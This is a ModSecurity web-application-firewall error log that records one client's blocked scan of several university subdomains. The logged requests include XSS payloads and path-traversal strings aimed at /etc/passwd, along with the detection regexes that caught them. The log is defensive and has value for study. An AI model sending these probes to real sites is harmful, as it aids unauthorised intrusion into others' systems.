[Tue Aug 29 11:56:39.595606 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAArIAVwAAAAX"]
[Tue Aug 29 11:56:39.617506 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?(x?or|div|like|between|and)\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]?\\\\d)|(?:\\\\\\\\x(?:23|27|3d))|(?:^.?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]$)|(?:(?:^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\\\\\]*?(?:[\\\\ ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "237"] [id "981242"] [msg "Detects classic SQL injection probings 1/2"] [data "Matched Data: (1)-\\x22x found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "informatika.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAArIAV0AAAAX"]
[Tue Aug 29 11:56:39.627231 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAAq-HdQAAAAT"]
[Tue Aug 29 11:56:39.652017 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?(x?or|div|like|between|and)\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]?\\\\d)|(?:\\\\\\\\x(?:23|27|3d))|(?:^.?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]$)|(?:(?:^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\\\\\]*?(?:[\\\\ ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "237"] [id "981242"] [msg "Detects classic SQL injection probings 1/2"] [data "Matched Data: (1)-\\x22x found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAArZPx4AAAAC"]
[Tue Aug 29 11:56:39.692998 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAArZPyAAAAAC"]
[Tue Aug 29 11:56:39.700020 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAArIAWEAAAAX"]
[Tue Aug 29 11:56:39.727918 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAAq-HdkAAAAT"]
[Tue Aug 29 11:56:39.730424 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAAqw53EAAAAH"]
[Tue Aug 29 11:56:39.732686 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?(x?or|div|like|between|and)\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]?\\\\d)|(?:\\\\\\\\x(?:23|27|3d))|(?:^.?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]$)|(?:(?:^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\\\\\]*?(?:[\\\\ ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "237"] [id "981242"] [msg "Detects classic SQL injection probings 1/2"] [data "Matched Data: (1)-\\x22x found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAArZPyIAAAAC"]
[Tue Aug 29 11:56:39.816756 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAAqw53UAAAAH"]
[Tue Aug 29 11:56:39.877261 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAAqw53gAAAAH"]
[Tue Aug 29 11:56:39.899281 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAArIAWoAAAAX"]
[Tue Aug 29 11:56:39.919728 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAArIAWsAAAAX"]
[Tue Aug 29 11:56:39.939385 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAAq-HeMAAAAT"]
[Tue Aug 29 11:56:40.535237 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAqw53wAAAAH"]
[Tue Aug 29 11:56:40.540567 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAq5@TIAAAAK"]
[Tue Aug 29 11:56:40.763098 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAq5@TMAAAAK"]
[Tue Aug 29 11:56:40.767777 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAocyloAAAAR"]
[Tue Aug 29 11:56:40.819741 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAoz8MQAAAAS"]
[Tue Aug 29 11:56:40.825045 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAq-HeUAAAAT"]
[Tue Aug 29 11:56:40.830915 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAqw530AAAAH"]
[Tue Aug 29 11:56:40.837489 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAq5@TUAAAAK"]
[Tue Aug 29 11:56:40.862795 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAoz8MYAAAAS"]
[Tue Aug 29 11:56:40.864929 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?(x?or|div|like|between|and)\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]?\\\\d)|(?:\\\\\\\\x(?:23|27|3d))|(?:^.?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]$)|(?:(?:^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\\\\\]*?(?:[\\\\ ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "237"] [id "981242"] [msg "Detects classic SQL injection probings 1/2"] [data "Matched Data: (1)-\\x22x found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16iMCo-f0AAAq-HeYAAAAT"]
[Tue Aug 29 11:56:40.887186 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAq3bBYAAAAI"]
[Tue Aug 29 11:56:40.914666 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16iMCo-f0AAAq3bBcAAAAI"]
[Tue Aug 29 11:56:40.939242 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16iMCo-f0AAAoz8MgAAAAS"]
[Tue Aug 29 11:56:41.638957 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16icCo-f0AAAoz8M0AAAAS"]
[Tue Aug 29 11:56:41.640237 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16icCo-f0AAAqw54AAAAAH"]
[Tue Aug 29 11:56:42.755140 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAArIAXQAAAAX"]
[Tue Aug 29 11:56:42.856317 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAAqsV-8AAAAB"]
[Tue Aug 29 11:56:42.964003 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAAqsWAMAAAAB"]
[Tue Aug 29 11:56:42.966171 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAAocymsAAAAR"]
